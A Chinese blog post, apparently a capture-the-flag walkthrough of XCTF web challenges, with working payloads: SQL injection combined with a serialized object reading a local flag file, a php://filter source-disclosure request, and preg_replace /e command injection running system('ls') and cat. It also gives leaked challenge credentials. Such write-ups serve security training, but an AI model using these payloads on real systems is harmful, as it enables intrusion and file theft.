攻防世界高手进阶区通关教程(2)

最新推荐文章于 2023-06-15 16:02:17 发布
VIP文章 最新推荐文章于 2023-06-15 16:02:17 发布
阅读量2.7k 收藏 1
点赞数 1
文章标签: flag ctf 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandao_ahfengren/article/details/106157693
版权

我们就直接开始吧

web2

源码给出了加密后的字符串,我们解密即可

代码块

import base64
def python_decode(string):
    zimu = "abcdefghijklmnopqrstuvwxyz" 
    rot_13 ="" 
    for i in string: 
        if i.isdigit():
            rot_13 += i
        else:
            try:
                rot_13 += zimu[zimu.index(i)-13] 
            except:
                rot_13 += zimu[zimu.index(i.lower())-13].upper()
    fz = rot_13[::-1]
    base = base64.b64decode(fz)
    base = [chr(ord(i)-1) for i in base]
    fz = base[::-1]
    print "".join(fz)

python_decode("a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws")

Fakebook

翻来翻去,发现了/view.php?no=1有注入

但是我们输入的信息会被保存并序列化

最后我们构造语句即可

/view.php?no=0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

解密后就是flag{c1e552fdf77049fabf65168f22f7aeab}

ics-05

这是文件包含页面,我们先把index.php文件包含进来看看

/index.php?page=php://filter/convert.base64-encode/resource=index.php

解密后得到源码,preg_replace可以构造我们的语句

我们需要加上X-Forwarded-For: 127.0.0.1才行,在url中加上我们的语句即可防包

查看文件列表

/index.php?pat=/(.*)/e&rep=system('ls')&sub=aa

s3chahahaDir文件夹

/index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=aa

查看flag文件夹

/index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=aa

/index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa

查看flag

FlatScience

简单的扫目录发现了login.php页面并且还有个debug参数可以查看源码

注意啊,这里的数据库不是mysql,是sqlite

查询出来账号密码,admin,ThinJerboa

然后拿这账号密码去admin.php登录进去就可以了

Cat

我们把url参数修改成%88发现报错了

通过报错信息我们发现数据库

我们再用django的方式打开

/index.php?url=@/opt/api/database.sqlite3

搜索ctf就看到了

ics-04

Findpwd.php页面存在sql注入,我们注入后得到

用户名 c3tlwDmIn23

密码 1qazWSXED56yhn8ujm9olk81wdfTG

问题 cetc

答案 cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds

我们再拿着这些去注册,然后登录即可

最低0.47元/天 解锁文章
锋刃科技
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界-web萌新-FlatScience(python处理pdf、sqlite注入)-Hack.lu-2017
Sea_Sand息禅
04-15 5754
日常扫描: 进站后点击链接尝试会让下载pdf文件。(后面要用到pdf文件) 访问robots.txt: 再依次对这两个页面进行测试: admin.php无论如何输入都没有什么反馈 login.php在username中输入admin' union select database()时报错: 可以看到是sqlite数据库,表的结构和查询函数和MySQL有所不同。 在这里花了相当长的时间...
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
Title CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算器本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar Tool IDA, pwntools Tag backdoor
攻防世界1-6题】题解和解题心得
weixin_51614272的博客
10-30 2192
攻防世界1-6题WP1.view_source解法一解法二2.robotsRobots协议:3.backup解法一解法二4.cookie解法一解法二解法三5.disabled_button解法一解法二解法三6.weak_auth 1.view_source 解法一 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 直接按F12点开代码一看,flag就在那 解法二 抓包(◕ᴗ◕✿) 2.robots 题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶
BUU CTF web(四)
0xdawn的博客
05-11 4959
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
攻防世界(week 1)
jiaofeiji的博客
04-09 37
用记事本打开,发现是一串特殊字符,上网查询得知为brainfuck编码。找个网站解密栈溢出覆盖返回backdoor地址根据提示查看子目录下的robots.txt一个自觉且善意的爬虫,应该在抓取网页之前,先阅读robots.txt,了解并执行网站管理者制定的爬虫规则。泄露了文件名PHP2扫描目录,泄露了源代码绕个弯子,让一开始写入的数据经过一次urldecode不为admin,但是通过两次为admin。
联邦学习后门攻击代码阅读——backdoors101
小水的博客
02-23 3162
代码地址 https://github.com/MrWater98/backdoors101 论文地址 https://arxiv.org/abs/1807.00459 https://arxiv.org/abs/2005.03823 代码阅读目标 清楚概括代码运行过程。 能将代码和论文相对应。 收集目前还不了解的内容。 只阅读和联邦学习相关的内容 代码结构 │ attack.py │ helper.py │ requirements.txt │ training.py ├─config
NDIS backdoor
04-06 2333
 I just spotted a scary looking rootkit project:http://www.xfocus.net/tools/200602/uay_source.rarthis is written by a guy called Uay, and it has the makings of a powerful rootkit.He has hook
攻防世界web进阶unfinish详解
hxhxhxhxx的博客
08-09 3897
攻防世界web进阶unfinish详解题目详解 题目 详解 我们使用御剑,扫描一波 我们进入注册页面查看,发现这个,有注册的话猜一下二次注入(这里注入,然后去页面看结果) 我们先拿AWVS试试, 哦~我的上帝,它存在注入 我们试试,burp的fuzz看看他过滤了什么 还是过滤了蛮多的 这些是都没过滤的 既然知道了他是sql注入 那么我们为啥不用sqlmap呢 我们使用sqlmap,发现只能知道这里有注入点,但是过滤很严重 我们需要找找合适的tamper 哦~我的上帝,果然不行,看来还得看看师
【愚公系列】2023年06月 攻防世界-Web(unfinish)
时光隧道
06-15 4172
SQL注入是一种常见的攻击方式,它利用web应用程序漏洞,通过向Web应用程序提交恶意的SQL语句,从而获得对数据库的访问权限。SQL注入常见的攻击方式包括:基于错误的注入攻击(error-based):通过构造报错语句,把数据库中的错误信息暴露给攻击者,从而获取敏感信息。基于盲注的攻击(blind-based):攻击者无法直接从Web应用程序获得数据库中的信息,但是他们可以通过提交变异的查询,来判断查询结果是否正确,进而推断出数据库中的信息。
CISCN-2018-Quals 2ex 攻防世界
qq_41071646的博客
06-07 1634
这个题目 感觉 挺。。。。 又是 MIPS框架的东西 本来一直想配置一下ida 那个插件但是 感觉很麻烦 我就没有配置 然后还是用的 jeb 然后 。。。。 跟着跟着就跟丢了 2333 主要对东西不太了解 但是 好好看一下 还是 能跟的 一开始没有看到这个细节 跟到后面发现了这个可疑字符串 去jeb 反编译一下 看看 这nm的不就是base64 看...
攻防世界misc进阶
dusk!的博客
04-08 357
做了misc新手篇之后来到了进阶,过然后面的越来越难,不过在做题中也找到了很多工具。图片上的是IDA目前我还没有整明白,在下面有提到的工具还是要好好的学习,因为我也是有的第一次用。 1.base64÷4 这道题就很基础了,就是用base来解决的64/4=16,所以用base16就可以得到flag 2.embarrass 刚开始下载的附件我在010中搜索flag没有结果,然后用到我第一次用的工具notepad打开搜索flag几下得到了想要的答案 3.wireshark-1 根据题目提示,黑客是登录.
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947409
暗战亮剑-黑客攻防入门与进阶全程实录
04-19
暗战亮剑-黑客攻防入门与进阶全程实录暗战亮剑-黑客攻防入门与进阶全程实录
黑客攻防入门与进阶
12-16
黑客攻防入门与进阶..
C#,数值计算,解微分方程的龙格-库塔二阶方法与源代码
04-25
C#,数值计算,解微分方程的龙格-库塔二阶方法与源代码 微分方程 含有导数或微分的方程称为微分方程,未知函数为一元函数的微分方程称为常微分方程。 微分方程的阶数 微分方程中导数或微分的最高阶数称为微分方程的阶数。 微分方程的解 使得微分方程成立的函数称为微分方程的解。 微分方程的特解 微分方程的不含任意常数的解称为微分方程的特解。 微分方程的通解 所含相互独立的任意常数的个数与微分方程的阶数相等的微分方程的解称为微分方程的通解。
桌面聊天室
04-25
该毕业设计采用了c/s架构,通过javase中的知识编写完成,系统功能包括:用户注册,用户登录,聊天功能。 对于刚学完java基础的同学来说可以通过该毕业设计加深对所学知识的理解。该系统使用socket进行数据的发送,用户注册登录之后,可以进行多人聊天,功能类似qq群聊。
【前端素材】大数据-交通大屏.zip
最新发布
04-25
大数据技术指的是用于处理和分析大规模数据集的技术和工具。以下是一些常见的大数据技术和工具: Hadoop:Apache Hadoop是一个用于分布式存储和处理大规模数据的开源框架。它包括Hadoop Distributed File System(HDFS)用于数据存储和MapReduce用于数据处理。 Spark:Apache Spark是一个快速、通用的集群计算系统,提供了比MapReduce更快的数据处理能力。它支持内存计算和更多复杂的数据处理流程。 NoSQL数据库:NoSQL数据库(如MongoDB、Cassandra等)则更适用于处理这类数据。 数据仓库:数据仓库是一个用于集成和分析大规模数据的存储系统,一些知名的数据仓库包括Snowflake、Amazon Redshift等。 数据湖:数据湖是一个存储结构化和非结构化数据的存储池,用于支持数据分析和机器学习应用。 机器学习:大数据技术也广泛应用于机器学习领域,支持大规模数据的模型训练和预测分析。 流式处理:针对实时数据处理需求,流式处理技术(如Apache Kafka、Apache Flink)可以实时。
攻防世界 reverse 2
10-21
根据提供的引用内容,攻防世界 reverse 2 是一道新手 Reverse 题目。在解包 hh 文件后,得到一个32位程序,使用 ida 进行逆向分析。在程序中发现了两个加密函数,其中函数1140是AES加密的S盒初始值密钥拓展。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值